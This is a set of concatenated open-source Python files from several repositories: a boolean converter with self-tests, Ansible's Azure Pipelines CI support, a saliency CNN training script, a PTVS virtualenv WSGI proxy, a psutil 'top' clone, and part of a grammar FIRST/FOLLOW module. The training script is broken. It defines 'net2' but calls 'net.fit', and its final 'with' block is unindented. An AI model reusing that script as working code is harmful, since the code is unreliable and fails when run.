    Numbers are interpreted by ordinary Python truthiness.  Anything
    else is unquoted, lower-cased and looked up among the accepted
    true/false spellings; an unrecognised value raises TypeError (after
    printing the normalised value when bDebug is truthy).
    """
    from six import print_ as print3
    from String.Get import getContentOutOfQuotes
    #
    if _isNumber( uValue ):
        return int( bool( uValue ) )
    #
    sLower = getContentOutOfQuotes( uValue ).lower()
    #
    if sLower in setBooleanTrue:
        return 1
    if sLower in setBooleanFalse:
        return 0
    #
    if bDebug:
        print3( sLower )
    raise TypeError
def getBoolFactory( sSystemSQL ):
    """Return a converter turning boolean-ish values into SQL literals.

    sqlite stores booleans as the integers 0/1, so the raw
    getBooleanInteger is returned for it; every other backend gets a
    wrapper yielding the keywords 'FALSE' / 'TRUE' instead.
    """
    if sSystemSQL == 'sqlite':
        return getBooleanInteger
    #
    def getBool( uValue ):
        return tBooleansSQL[ getBooleanInteger( uValue ) ]
    #
    return getBool
if __name__ == "__main__":
    #
    # Self test: exercise getBooleanInteger() and getBoolFactory() and
    # report any failures via sayTestResult().
    #
    from Iter.AllVers import lMap, tMap
    from Utils.Result import sayTestResult
    #
    lProblems = []
    #
    # every accepted true spelling (and a non-zero number) must map to 1,
    # every accepted false spelling (and zero) must map to 0
    tBoolStrings = ( 8, 't', 'true', 'y', 'yes', '1', 0, 'f', 'false', 'n', 'no', '0' )
    #
    lBools = tMap( getBooleanInteger, tBoolStrings )
    #
    if lBools != ( 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0 ):
        #
        lProblems.append( 'getBooleanInteger() valid values' )
    #
    # an unrecognised string must raise TypeError
    try:
        #
        getBooleanInteger( 'xyz', bDebug = 0 )
        #
    except TypeError:
        #
        pass
        #
    else:
        #
        # we are here only if a TypeError exception was not raised!
        #
        lProblems.append( 'getBooleanInteger() invalid value' )
    #
    dResults = {}
    #
    for sSystemSQL in ( 'sqlite', 'postgresql' ):
        #
        getBool = getBoolFactory( sSystemSQL )
        #
        dResults[ sSystemSQL ] = lMap( getBool, tBoolStrings )
    #
    if dResults[ 'sqlite' ] != [1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0]:
        #
        lProblems.append( 'getBoolFactory() for sqlite' )
    #
    if dResults[ 'postgresql' ] != \
            [ 'TRUE', 'TRUE', 'TRUE', 'TRUE', 'TRUE', 'TRUE',
              'FALSE', 'FALSE', 'FALSE', 'FALSE', 'FALSE', 'FALSE' ]:
        #
        lProblems.append( 'getBoolFactory() for SQL compatibles' )
    #
    sayTestResult( lProblems )
computersalat/ansible | test/lib/ansible_test/_internal/ci/azp.py | 8 | 9846 | """Support code for working with Azure Pipelines."""
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import re
import tempfile
import uuid
from .. import types as t
from ..encoding import (
to_bytes,
)
from ..config import (
CommonConfig,
TestConfig,
)
from ..git import (
Git,
)
from ..http import (
HttpClient,
urlencode,
)
from ..util import (
display,
MissingEnvironmentVariable,
)
from . import (
AuthContext,
ChangeDetectionNotSupported,
CIProvider,
CryptographyAuthHelper,
)
CODE = 'azp'
class AzurePipelines(CIProvider):
    """CI provider implementation for Azure Pipelines."""
    def __init__(self):
        self.auth = AzurePipelinesAuthHelper()

    @staticmethod
    def is_supported():  # type: () -> bool
        """Return True if this provider is supported in the current running environment."""
        collection_uri = os.environ.get('SYSTEM_COLLECTIONURI', '')
        return collection_uri.startswith('https://dev.azure.com/')

    @property
    def code(self):  # type: () -> str
        """Return a unique code representing this provider."""
        return CODE

    @property
    def name(self):  # type: () -> str
        """Return descriptive name for this provider."""
        return 'Azure Pipelines'

    def generate_resource_prefix(self):  # type: () -> str
        """Return a resource prefix specific to this CI provider."""
        try:
            raw_prefix = 'azp-%s-%s-%s' % (
                os.environ['BUILD_BUILDID'],
                os.environ['SYSTEM_JOBATTEMPT'],
                os.environ['SYSTEM_JOBIDENTIFIER'],
            )
        except KeyError as ex:
            raise MissingEnvironmentVariable(name=ex.args[0])

        # Collapse anything that is not alphanumeric into single dashes so
        # the prefix is safe to embed in resource names.
        return re.sub(r'[^a-zA-Z0-9]+', '-', raw_prefix)

    def get_base_branch(self):  # type: () -> str
        """Return the base branch or an empty string."""
        branch_name = os.environ.get('SYSTEM_PULLREQUEST_TARGETBRANCH') or os.environ.get('BUILD_SOURCEBRANCHNAME')

        if not branch_name:
            return ''

        return 'origin/%s' % branch_name

    def detect_changes(self, args):  # type: (TestConfig) -> t.Optional[t.List[str]]
        """Initialize change detection."""
        changes = AzurePipelinesChanges(args)

        job_type = 'pull request' if changes.is_pr else 'merge commit'
        display.info('Processing %s for branch %s commit %s' % (job_type, changes.branch, changes.commit))

        if not args.metadata.changes:
            args.metadata.populate_changes(changes.diff)

        if changes.paths is None:
            # There are several likely causes of this:
            # - First run on a new branch.
            # - Too many pull requests passed since the last merge run passed.
            display.warning('No successful commit found. All tests will be executed.')

        return changes.paths

    def supports_core_ci_auth(self, context):  # type: (AuthContext) -> bool
        """Return True if Ansible Core CI is supported."""
        return True

    def prepare_core_ci_auth(self, context):  # type: (AuthContext) -> t.Dict[str, t.Any]
        """Return authentication details for Ansible Core CI."""
        try:
            request = dict(
                org_name=os.environ['SYSTEM_COLLECTIONURI'].strip('/').split('/')[-1],
                project_name=os.environ['SYSTEM_TEAMPROJECT'],
                build_id=int(os.environ['BUILD_BUILDID']),
                task_id=str(uuid.UUID(os.environ['SYSTEM_TASKINSTANCEID'])),
            )
        except KeyError as ex:
            raise MissingEnvironmentVariable(name=ex.args[0])

        self.auth.sign_request(request)

        return dict(azp=request)

    def get_git_details(self, args):  # type: (CommonConfig) -> t.Optional[t.Dict[str, t.Any]]
        """Return details about git in the current environment."""
        changes = AzurePipelinesChanges(args)

        return dict(
            base_commit=changes.base_commit,
            commit=changes.commit,
        )
class AzurePipelinesAuthHelper(CryptographyAuthHelper):
    """
    Authentication helper for Azure Pipelines.
    Based on cryptography since it is provided by the default Azure Pipelines environment.
    """
    def publish_public_key(self, public_key_pem):  # type: (str) -> None
        """Publish the given public key by attaching it to the build timeline."""
        # The agent processes the attachment at an unknown later time, so
        # the temporary file must outlive this call and cannot be deleted.
        public_key_file = tempfile.NamedTemporaryFile(prefix='public-key-', suffix='.pem', delete=False)

        with public_key_file:
            public_key_file.write(to_bytes(public_key_pem))
            public_key_file.flush()

            # make the agent aware of the public key by declaring it as an attachment
            vso_add_attachment('ansible-core-ci', 'public-key.pem', public_key_file.name)
class AzurePipelinesChanges:
    """Change information for an Azure Pipelines build."""
    def __init__(self, args):  # type: (CommonConfig) -> None
        self.args = args
        self.git = Git()
        # All of these variables are documented as always set by the agent;
        # a missing one indicates we are not really running under Azure
        # Pipelines.
        try:
            self.org_uri = os.environ['SYSTEM_COLLECTIONURI']  # ex: https://dev.azure.com/{org}/
            self.project = os.environ['SYSTEM_TEAMPROJECT']
            self.repo_type = os.environ['BUILD_REPOSITORY_PROVIDER']  # ex: GitHub
            self.source_branch = os.environ['BUILD_SOURCEBRANCH']
            self.source_branch_name = os.environ['BUILD_SOURCEBRANCHNAME']
            self.pr_branch_name = os.environ.get('SYSTEM_PULLREQUEST_TARGETBRANCH')
        except KeyError as ex:
            raise MissingEnvironmentVariable(name=ex.args[0])
        if self.source_branch.startswith('refs/tags/'):
            raise ChangeDetectionNotSupported('Change detection is not supported for tags.')
        self.org = self.org_uri.strip('/').split('/')[-1]
        # The PR target branch variable is only present for pull request builds.
        self.is_pr = self.pr_branch_name is not None
        if self.is_pr:
            # HEAD is a merge commit of the PR branch into the target branch
            # HEAD^1 is HEAD of the target branch (first parent of merge commit)
            # HEAD^2 is HEAD of the PR branch (second parent of merge commit)
            # see: https://git-scm.com/docs/gitrevisions
            self.branch = self.pr_branch_name
            self.base_commit = 'HEAD^1'
            self.commit = 'HEAD^2'
        else:
            # Merge build: diff against the most recent commit that already
            # passed a successful merge run (queried from the AZP API).
            commits = self.get_successful_merge_run_commits()
            self.branch = self.source_branch_name
            self.base_commit = self.get_last_successful_commit(commits)
            self.commit = 'HEAD'
        # Resolve the symbolic revisions to full commit hashes.
        self.commit = self.git.run_git(['rev-parse', self.commit]).strip()
        if self.base_commit:
            self.base_commit = self.git.run_git(['rev-parse', self.base_commit]).strip()
            # <rev1>..<rev2>
            # Include commits that are reachable from <rev2> but exclude those that are reachable from <rev1>.
            # see: https://git-scm.com/docs/gitrevisions
            dot_range = '%s..%s' % (self.base_commit, self.commit)
            self.paths = sorted(self.git.get_diff_names([dot_range]))
            self.diff = self.git.get_diff([dot_range])
        else:
            self.paths = None  # act as though change detection not enabled, do not filter targets
            self.diff = []
    def get_successful_merge_run_commits(self):  # type: () -> t.Set[str]
        """Return a set of recent successful merge commits from Azure Pipelines."""
        parameters = dict(
            maxBuildsPerDefinition=100,  # max 5000
            queryOrder='queueTimeDescending',  # assumes under normal circumstances that later queued jobs are for later commits
            resultFilter='succeeded',
            reasonFilter='batchedCI',  # may miss some non-PR reasons, the alternative is to filter the list after receiving it
            repositoryType=self.repo_type,
            repositoryId='%s/%s' % (self.org, self.project),
        )
        url = '%s%s/build/builds?%s' % (self.org_uri, self.project, urlencode(parameters))
        http = HttpClient(self.args)
        response = http.get(url)
        # noinspection PyBroadException
        try:
            result = response.json()
        except Exception:  # pylint: disable=broad-except
            # most likely due to a private project, which returns an HTTP 203 response with HTML
            display.warning('Unable to find project. Cannot determine changes. All tests will be executed.')
            return set()
        commits = set(build['sourceVersion'] for build in result['value'])
        return commits
    def get_last_successful_commit(self, commits):  # type: (t.Set[str]) -> t.Optional[str]
        """Return the last successful commit from git history that is found in the given commit list, or None."""
        # rev-list yields newest-first, so the first match is the most recent.
        commit_history = self.git.get_rev_list(max_count=100)
        ordered_successful_commits = [commit for commit in commit_history if commit in commits]
        last_successful_commit = ordered_successful_commits[0] if ordered_successful_commits else None
        return last_successful_commit
def vso_add_attachment(file_type, file_name, path):  # type: (str, str, str) -> None
    """Upload and attach a file to the current timeline record."""
    properties = dict(type=file_type, name=file_name)
    vso('task.addattachment', properties, path)
def vso(name, data, message):  # type: (str, t.Dict[str, str], str) -> None
    """
    Write a logging command for the Azure Pipelines agent to process.
    See: https://docs.microsoft.com/en-us/azure/devops/pipelines/scripts/logging-commands?view=azure-devops&tabs=bash
    """
    # Properties are rendered as "key=value" pairs joined by semicolons.
    properties = ';'.join('%s=%s' % (key, value) for key, value in data.items())
    display.info('##vso[%s %s]%s' % (name, properties, message))
| gpl-3.0 |
imatge-upc/saliency-2016-cvpr | shallow/train.py | 2 | 3064 | # add to kfkd.py
from lasagne import layers
from lasagne.updates import nesterov_momentum
from nolearn.lasagne import NeuralNet,BatchIterator
import os
import numpy as np
from sklearn.utils import shuffle
import cPickle as pickle
import matplotlib.pyplot as plt
import Image
import ImageOps
from scipy import misc
import scipy.io
import theano
def load():
    """Load the pickled SALICON training data.

    Returns:
        (X, y) tuple exactly as stored in data_Salicon_T.cPickle.
    """
    # Use a context manager so the handle is closed even if unpickling raises;
    # the original opened with the Python-2-only file() builtin and leaked the
    # handle on error. 'rb' is required because pickle data is binary.
    with open('data_Salicon_T.cPickle', 'rb') as f:
        X, y = pickle.load(f)
    return X, y
def float32(k):
    """Cast *k* (scalar or array-like) to numpy float32."""
    # np.float32 replaces np.cast['float32'], which was deprecated and removed
    # in NumPy 2.0. NOTE(review): np.float32 returns a numpy scalar for scalar
    # input where np.cast returned a 0-d array; both are accepted by
    # theano.shared/set_value as used in this script.
    return np.float32(k)
class AdjustVariable(object):
    """nolearn epoch callback that linearly anneals a shared NeuralNet
    attribute (e.g. learning rate or momentum) from *start* to *stop*
    over the net's max_epochs."""

    def __init__(self, name, start=0.03, stop=0.001):
        self.name = name
        self.start = start
        self.stop = stop
        self.ls = None  # per-epoch schedule, built lazily on first call

    def __call__(self, nn, train_history):
        # Build the schedule once the epoch count is known.
        if self.ls is None:
            self.ls = np.linspace(self.start, self.stop, nn.max_epochs)
        epoch = train_history[-1]['epoch']
        scheduled = float32(self.ls[epoch - 1])
        getattr(nn, self.name).set_value(scheduled)
class FlipBatchIterator(BatchIterator):
    # Data-augmentation iterator: horizontally mirrors a random half of each
    # batch, flipping both the input images and their 48x48 saliency targets.
    def transform(self, Xb, yb):
        Xb, yb = super(FlipBatchIterator, self).transform(Xb, yb)
        # Flip half of the images in this batch at random:
        bs = Xb.shape[0]
        # NOTE(review): bs / 2 relies on Python 2 integer division; under
        # Python 3 this would pass a float to np.random.choice — confirm.
        indices = np.random.choice(bs, bs / 2, replace=False)
        # Mirror images along the last (width) axis.
        Xb[indices] = Xb[indices, :, :, ::-1]
        # Targets are flat 48*48 vectors: reshape to 2-D, mirror, flatten back.
        tmp = yb[indices].reshape(bs/2,1,48,48)
        mirror = tmp[ :,:,:, ::-1]
        yb[indices] = mirror.reshape(bs/2,48*48)
        return Xb, yb
net2 = NeuralNet(
layers=[
('input', layers.InputLayer),
('conv1', layers.Conv2DLayer),
('pool1', layers.MaxPool2DLayer),
('conv2', layers.Conv2DLayer),
('pool2', layers.MaxPool2DLayer),
('conv3', layers.Conv2DLayer),
('pool3', layers.MaxPool2DLayer),
('hidden4', layers.DenseLayer),
('maxout6',layers.FeaturePoolLayer),
('output', layers.DenseLayer),
],
input_shape=(None, 3, 96, 96),
conv1_num_filters=32, conv1_filter_size=(5, 5), pool1_pool_size=(2, 2),
conv2_num_filters=64, conv2_filter_size=(3, 3), pool2_pool_size=(2, 2),
conv3_num_filters=64, conv3_filter_size=(3, 3), pool3_pool_size=(2, 2),
hidden4_num_units=48*48*2,
maxout6_pool_size=2,output_num_units=48*48,output_nonlinearity=None,
update_learning_rate=theano.shared(float32(0.05)),
update_momentum=theano.shared(float32(0.9)),
regression=True,
on_epoch_finished=[
AdjustVariable('update_learning_rate', start=0.05, stop=0.0001),
AdjustVariable('update_momentum', start=0.9, stop=0.999),
],
batch_iterator_train=FlipBatchIterator(batch_size=128),
max_epochs=1200,
verbose=1,
)
X, y = load()
print("X.shape == {}; X.min == {:.3f}; X.max == {:.3f}".format(
X.shape, X.min(), X.max()))
print("y.shape == {}; y.min == {:.3f}; y.max == {:.3f}".format(
y.shape, y.min(), y.max()))
X = X.astype(np.float32)
y = y.astype(np.float32)
net.fit(X, y)
with open('JuntingNet_SALICON.pickle', 'wb') as f:
pickle.dump(net2, f, -1) | mit |
SUSE/azure-sdk-for-python | examples/AzureResourceViewer/ptvs_virtualenv_proxy.py | 58 | 4204 | # ############################################################################
#
# Copyright (c) Microsoft Corporation.
#
# This source code is subject to terms and conditions of the Apache License, Version 2.0. A
# copy of the license can be found in the License.html file at the root of this distribution. If
# you cannot locate the Apache License, Version 2.0, please send an email to
# vspython@microsoft.com. By using this source code in any fashion, you are agreeing to be bound
# by the terms of the Apache License, Version 2.0.
#
# You must not remove this notice, or any other, from this software.
#
# ###########################################################################
import datetime
import os
import sys
import traceback
if sys.version_info[0] == 3:
    # Python 3: environment values may arrive as bytes; decode them, and
    # provide a replacement for the removed execfile() builtin.
    def to_str(value):
        return value.decode(sys.getfilesystemencoding())

    def execfile(path, global_dict):
        """Execute a file"""
        with open(path, 'r') as f:
            code = f.read()
        # Normalize Windows line endings and guarantee a trailing newline
        # so compile/exec accepts the source.
        code = code.replace('\r\n', '\n') + '\n'
        exec(code, global_dict)
else:
    # Python 2: the symmetric conversion is unicode -> encoded bytes.
    def to_str(value):
        return value.encode(sys.getfilesystemencoding())
def log(txt):
    """Append *txt* (timestamped) to the file named by the WSGI_LOG env var, if set."""
    target = os.environ.get('WSGI_LOG')
    if not target:
        return
    # The context manager guarantees the handle is closed even if write fails.
    with open(target, 'a+') as handle:
        handle.write('%s: %s' % (datetime.datetime.now(), txt))
# Optionally enable remote debugging: if a ptvsd secret is configured,
# start the Python Tools for Visual Studio debug server at import time.
ptvsd_secret = os.getenv('WSGI_PTVSD_SECRET')
if ptvsd_secret:
    log('Enabling ptvsd ...\n')
    try:
        import ptvsd
        try:
            ptvsd.enable_attach(ptvsd_secret)
            log('ptvsd enabled.\n')
        except:
            # Best-effort: debugging must never break the app; the bare
            # except is deliberate here.
            log('ptvsd.enable_attach failed\n')
    except ImportError:
        log('error importing ptvsd.\n');
def get_wsgi_handler(handler_name):
    # Resolve a dotted "pkg.module.attr" (optionally "…attr()") string into
    # a WSGI callable. Because the module/attribute boundary is ambiguous,
    # it tries the right-most split first and moves the split point left on
    # each ImportError.
    if not handler_name:
        raise Exception('WSGI_ALT_VIRTUALENV_HANDLER env var must be set')
    if not isinstance(handler_name, str):
        handler_name = to_str(handler_name)
    # Split into candidate module path and attribute; a trailing "()" means
    # the resolved attribute should be called to produce the handler.
    module_name, _, callable_name = handler_name.rpartition('.')
    should_call = callable_name.endswith('()')
    callable_name = callable_name[:-2] if should_call else callable_name
    name_list = [(callable_name, should_call)]
    handler = None
    last_tb = ''
    while module_name:
        try:
            handler = __import__(module_name, fromlist=[name_list[0][0]])
            last_tb = ''
            # Walk the accumulated attribute chain, invoking where requested.
            for name, should_call in name_list:
                handler = getattr(handler, name)
                if should_call:
                    handler = handler()
            break
        except ImportError:
            # The split point was inside a package: move the last dotted
            # component from the module part onto the attribute chain and
            # retry with a shorter module name.
            module_name, _, callable_name = module_name.rpartition('.')
            should_call = callable_name.endswith('()')
            callable_name = callable_name[:-2] if should_call else callable_name
            name_list.insert(0, (callable_name, should_call))
            handler = None
            last_tb = ': ' + traceback.format_exc()
    if handler is None:
        raise ValueError('"%s" could not be imported%s' % (handler_name, last_tb))
    return handler
# Path to the virtualenv's activate_this.py (or, for get_venv_handler, the
# venv interpreter). Required for either activation strategy below.
activate_this = os.getenv('WSGI_ALT_VIRTUALENV_ACTIVATE_THIS')
if not activate_this:
    raise Exception('WSGI_ALT_VIRTUALENV_ACTIVATE_THIS is not set')
def get_virtualenv_handler():
    """Activate a legacy virtualenv via its activate_this.py and return the
    WSGI handler named by WSGI_ALT_VIRTUALENV_HANDLER."""
    log('Activating virtualenv with %s\n' % activate_this)
    execfile(activate_this, {'__file__': activate_this})
    log('Getting handler %s\n' % os.getenv('WSGI_ALT_VIRTUALENV_HANDLER'))
    wsgi_app = get_wsgi_handler(os.getenv('WSGI_ALT_VIRTUALENV_HANDLER'))
    log('Got handler: %r\n' % wsgi_app)
    return wsgi_app
def get_venv_handler():
    """Activate a PEP 405 venv and return the configured WSGI handler."""
    log('Activating venv with executable at %s\n' % activate_this)
    import site
    # Point sys.executable at the venv interpreter, then rebuild sys.path
    # from scratch via site.main() so the venv's site-packages are used.
    sys.executable = activate_this
    old_sys_path, sys.path = sys.path, []
    site.main()
    sys.path.insert(0, '')
    # Re-append any original path entries that site.main() did not restore.
    for item in old_sys_path:
        if item not in sys.path:
            sys.path.append(item)
    log('Getting handler %s\n' % os.getenv('WSGI_ALT_VIRTUALENV_HANDLER'))
    handler = get_wsgi_handler(os.getenv('WSGI_ALT_VIRTUALENV_HANDLER'))
    log('Got handler: %r\n' % handler)
    return handler
| mit |
fmacias64/Dato-Core | src/unity/python_deps/psutil/examples/top.py | 44 | 7382 | #!/usr/bin/env python
# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
A clone of top / htop.
Author: Giampaolo Rodola' <g.rodola@gmail.com>
$ python examples/top.py
CPU0 [| ] 4.9%
CPU1 [||| ] 7.8%
CPU2 [ ] 2.0%
CPU3 [||||| ] 13.9%
Mem [||||||||||||||||||| ] 49.8% 4920M/9888M
Swap [ ] 0.0% 0M/0M
Processes: 287 (running=1 sleeping=286)
Load average: 0.34 0.54 0.46 Uptime: 3 days, 10:16:37
PID USER NI VIRT RES CPU% MEM% TIME+ NAME
------------------------------------------------------------
989 giampaol 0 66M 12M 7.4 0.1 0:00.61 python
2083 root 0 506M 159M 6.5 1.6 0:29.26 Xorg
4503 giampaol 0 599M 25M 6.5 0.3 3:32.60 gnome-terminal
3868 giampaol 0 358M 8M 2.8 0.1 23:12.60 pulseaudio
3936 giampaol 0 1G 111M 2.8 1.1 33:41.67 compiz
4401 giampaol 0 536M 141M 2.8 1.4 35:42.73 skype
4047 giampaol 0 743M 76M 1.8 0.8 42:03.33 unity-panel-service
13155 giampaol 0 1G 280M 1.8 2.8 41:57.34 chrome
10 root 0 0B 0B 0.9 0.0 4:01.81 rcu_sched
339 giampaol 0 1G 113M 0.9 1.1 8:15.73 chrome
...
"""
import os
import sys
if os.name != 'posix':
sys.exit('platform not supported')
import atexit
import curses
import time
from datetime import datetime, timedelta
import psutil
# --- curses stuff
def tear_down():
    """Restore the terminal to its normal state (undo curses init)."""
    win.keypad(0)
    curses.nocbreak()
    curses.echo()
    curses.endwin()
win = curses.initscr()
atexit.register(tear_down)  # always restore the terminal on exit
curses.endwin()
lineno = 0  # next screen row used by print_line()
def print_line(line, highlight=False):
    """A thin wrapper around curses's addstr()."""
    global lineno
    try:
        if highlight:
            # Pad to full width so the reverse-video highlight spans the row.
            line += " " * (win.getmaxyx()[1] - len(line))
            win.addstr(lineno, 0, line, curses.A_REVERSE)
        else:
            win.addstr(lineno, 0, line, 0)
    except curses.error:
        # Screen is full: reset to the top, flush what we have, and let the
        # caller decide (refresh_window breaks out of its loop on this).
        lineno = 0
        win.refresh()
        raise
    else:
        lineno += 1
# --- /curses stuff
def bytes2human(n):
    """Render a byte count with a binary-unit suffix (truncated, not rounded).

    >>> bytes2human(10000)
    '9K'
    >>> bytes2human(100001221)
    '95M'
    """
    units = ('K', 'M', 'G', 'T', 'P', 'E', 'Z', 'Y')
    # Try the largest unit first; 1 << ((exp + 1) * 10) is 1024 ** (exp + 1).
    for exp in range(len(units) - 1, -1, -1):
        threshold = 1 << ((exp + 1) * 10)
        if n >= threshold:
            return '%s%s' % (int(float(n) / threshold), units[exp])
    return "%sB" % n
def poll(interval):
    """Sleep *interval* seconds, then snapshot all processes.

    Returns (processes sorted by CPU%% descending, {status: count}).
    Each returned process carries its snapshot in ``p.dict``.
    """
    # sleep some time
    time.sleep(interval)
    procs = []
    procs_status = {}
    for p in psutil.process_iter():
        try:
            p.dict = p.as_dict(['username', 'nice', 'memory_info',
                                'memory_percent', 'cpu_percent',
                                'cpu_times', 'name', 'status'])
            # Tally per-status counts (running/sleeping/...).
            try:
                procs_status[p.dict['status']] += 1
            except KeyError:
                procs_status[p.dict['status']] = 1
        except psutil.NoSuchProcess:
            # Process exited between enumeration and inspection; skip it.
            pass
        else:
            procs.append(p)
    # return processes sorted by CPU percent usage
    processes = sorted(procs, key=lambda p: p.dict['cpu_percent'],
                       reverse=True)
    return (processes, procs_status)
def print_header(procs_status, num_procs):
    """Print system-related info, above the process list."""

    def get_dashes(perc):
        # Scale a 0-100 percentage onto a 40-character bar.
        dashes = "|" * int((float(perc) / 10 * 4))
        empty_dashes = " " * (40 - len(dashes))
        return dashes, empty_dashes

    # cpu usage
    percs = psutil.cpu_percent(interval=0, percpu=True)
    for cpu_num, perc in enumerate(percs):
        dashes, empty_dashes = get_dashes(perc)
        print_line(" CPU%-2s [%s%s] %5s%%" % (cpu_num, dashes, empty_dashes,
                                              perc))
    # memory usage (used = total - available, i.e. excluding caches)
    mem = psutil.virtual_memory()
    dashes, empty_dashes = get_dashes(mem.percent)
    used = mem.total - mem.available
    line = " Mem [%s%s] %5s%% %6s/%s" % (
        dashes, empty_dashes,
        mem.percent,
        str(int(used / 1024 / 1024)) + "M",
        str(int(mem.total / 1024 / 1024)) + "M"
    )
    print_line(line)
    # swap usage
    swap = psutil.swap_memory()
    dashes, empty_dashes = get_dashes(swap.percent)
    line = " Swap [%s%s] %5s%% %6s/%s" % (
        dashes, empty_dashes,
        swap.percent,
        str(int(swap.used / 1024 / 1024)) + "M",
        str(int(swap.total / 1024 / 1024)) + "M"
    )
    print_line(line)
    # processes number and status
    st = []
    for x, y in procs_status.items():
        if y:
            st.append("%s=%s" % (x, y))
    # Show running/sleeping first, the rest after.
    st.sort(key=lambda x: x[:3] in ('run', 'sle'), reverse=1)
    print_line(" Processes: %s (%s)" % (num_procs, ' '.join(st)))
    # load average, uptime
    uptime = datetime.now() - datetime.fromtimestamp(psutil.boot_time())
    av1, av2, av3 = os.getloadavg()
    line = " Load average: %.2f %.2f %.2f  Uptime: %s" \
        % (av1, av2, av3, str(uptime).split('.')[0])
    print_line(line)
def refresh_window(procs, procs_status):
    """Print results on screen by using curses."""
    curses.endwin()
    templ = "%-6s %-8s %4s %5s %5s %6s %4s %9s %2s"
    win.erase()
    header = templ % ("PID", "USER", "NI", "VIRT", "RES", "CPU%", "MEM%",
                      "TIME+", "NAME")
    print_header(procs_status, len(procs))
    print_line("")
    print_line(header, highlight=True)
    for p in procs:
        # TIME+ column shows process CPU cumulative time and it
        # is expressed as: "mm:ss.ms"
        if p.dict['cpu_times'] is not None:
            ctime = timedelta(seconds=sum(p.dict['cpu_times']))
            ctime = "%s:%s.%s" % (ctime.seconds // 60 % 60,
                                  str((ctime.seconds % 60)).zfill(2),
                                  str(ctime.microseconds)[:2])
        else:
            ctime = ''
        # Normalize missing metrics to empty strings for display.
        if p.dict['memory_percent'] is not None:
            p.dict['memory_percent'] = round(p.dict['memory_percent'], 1)
        else:
            p.dict['memory_percent'] = ''
        if p.dict['cpu_percent'] is None:
            p.dict['cpu_percent'] = ''
        if p.dict['username']:
            username = p.dict['username'][:8]
        else:
            username = ""
        line = templ % (p.pid,
                        username,
                        p.dict['nice'],
                        bytes2human(getattr(p.dict['memory_info'], 'vms', 0)),
                        bytes2human(getattr(p.dict['memory_info'], 'rss', 0)),
                        p.dict['cpu_percent'],
                        p.dict['memory_percent'],
                        ctime,
                        p.dict['name'] or '',
                        )
        try:
            print_line(line)
        except curses.error:
            # Out of screen rows; stop printing further processes.
            break
    win.refresh()
def main():
    """Poll-and-redraw loop; first draw is immediate, then once per second.

    Exits cleanly on Ctrl-C / SystemExit.
    """
    interval = 0
    try:
        while True:
            snapshot = poll(interval)
            refresh_window(*snapshot)
            interval = 1
    except (KeyboardInterrupt, SystemExit):
        pass


if __name__ == '__main__':
    main()
| agpl-3.0 |
shaunstanislaus/Skoarcery | Skoarcery/dragonsets.py | 3 | 5398 | # ==========================================
# FIRST and FOLLOW sets from the dragon book
# ==========================================
from Skoarcery.langoids import Nonterminal, Production, Langoid
FIRST = None
FOLLOW = None
def init(compute=True):
    """(Re)create the module-global FIRST/FOLLOW sets; optionally compute them."""
    global FIRST, FOLLOW
    FIRST = DragonSet("FIRST")
    FOLLOW = DragonSet("FOLLOW")
    print("Dragon sets initialized.")
    if compute:
        compute_sets()
def compute_sets():
    """Run the FIRST then FOLLOW fixed-point computations (order matters:
    FOLLOW depends on FIRST)."""
    compute_firsts()
    compute_follows()
    print("Dragon sets computed")
class DragonSet:
    """A keyed family of grammar sets (FIRST or FOLLOW), indexed by name.

    Calling the instance with a terminal/nonterminal returns its set,
    creating an empty one on demand. Calling FIRST with a Production or a
    symbol sequence computes FIRST of the sequence instead of storing it.
    """

    def __init__(self, name):
        # name is "FIRST" or "FOLLOW"; D maps langoid name -> set of elements
        self.name = name
        self.D = dict()

    def __call__(self, *args):
        key = ""
        X = args[0]
        if not X:
            print("EH? " + repr(args))
            raise AssertionError
        # Accept a raw name, a Langoid, a Production, or a symbol list.
        if isinstance(X, str):
            key = X
        if isinstance(X, Langoid):
            key = X.name
        if isinstance(X, Production):
            X = X.production
        if isinstance(X, list):
            # FIRST of a sequence is computed on the fly; FOLLOW of a
            # sequence is meaningless here.
            if self.name == "FIRST":
                return FIRST_SEQ(X)
            raise NotImplementedError
        #print("Key: " + key + " < " + str(X) + " < " + repr(args[0]))
        try:
            S = self.D[key]
        except KeyError:
            # Create the set lazily so callers can always mutate the result.
            S = set()
            self.D[key] = S
        return S

    def __len__(self):
        # Total element count across all sets; used to detect the fixpoint
        # (no set grew during a whole pass).
        i = 0
        for S in self.D.values():
            i += len(S)
        return i

    def add_element(self, key, element):
        #print("add_element: " + repr(key) + str(key.__class__))
        try:
            S = self.D[key.name]
        except KeyError:
            S = set()
        S.add(element)
        self.D[key.name] = S

    def __str__(self):
        s = ""
        for k, v in self.D.items():
            s += self.name + "(" + str(k) + "): " + str(v) + "\n"
        return s
def compute_firsts():
    """Populate FIRST for all terminals and nonterminals by fixed-point
    iteration (the dragon-book FIRST algorithm)."""
    from Skoarcery.terminals import Empty, tokens as T
    from Skoarcery.nonterminals import nonterminals as N
    global FIRST
    # do terminals first
    for X in T.values():
        FIRST(X).add(X)
    last = 0
    first_len = len(FIRST)
    # Repeat whole passes until no FIRST set grows any further.
    while first_len > last:
        last = first_len
        for X in N.values():
            if X.derives_empty:
                FIRST(X).add(Empty)
            for R in X.production_rules:
                i = -1
                n = len(R.production)  # NOTE(review): n is unused
                # figure out FIRST(X) first
                for Yi in R.production:
                    i += 1
                    # FIRST of each suffix Yi..Yn is cached alongside FIRST(X).
                    Yi_to_end = R.production[i:]
                    if len(Yi_to_end) > 0:
                        S = FIRST(Yi_to_end)
                        S.update(
                            everything_but_e(FIRST(Yi))
                        )
                        FIRST(X).update(S)
                        FIRST(Yi_to_end).update(S)
                    # Stop once a symbol cannot derive Empty: later symbols
                    # cannot contribute to FIRST of this production.
                    if not Yi.derives_empty:
                        break
                # if we got to the end of the loop without breaking, add Empty
                else:
                    FIRST(X).add(Empty)
        first_len = len(FIRST)
def everything_but_e(S):
    """Return a copy of *S* with the Empty terminal filtered out."""
    from Skoarcery.terminals import Empty
    return set(el for el in S if el != Empty)
#noinspection PyPep8Naming
def FIRST_SEQ(list_of_langoids):
    """FIRST of a symbol sequence Y1 Y2 ... Yn.

    Accumulates FIRST(Yi) minus Empty for each prefix symbol that can
    derive Empty; Empty itself is included only if every Yi can.
    """
    from Skoarcery.terminals import Empty
    global FIRST
    OUT = set()
    for Yi in list_of_langoids:
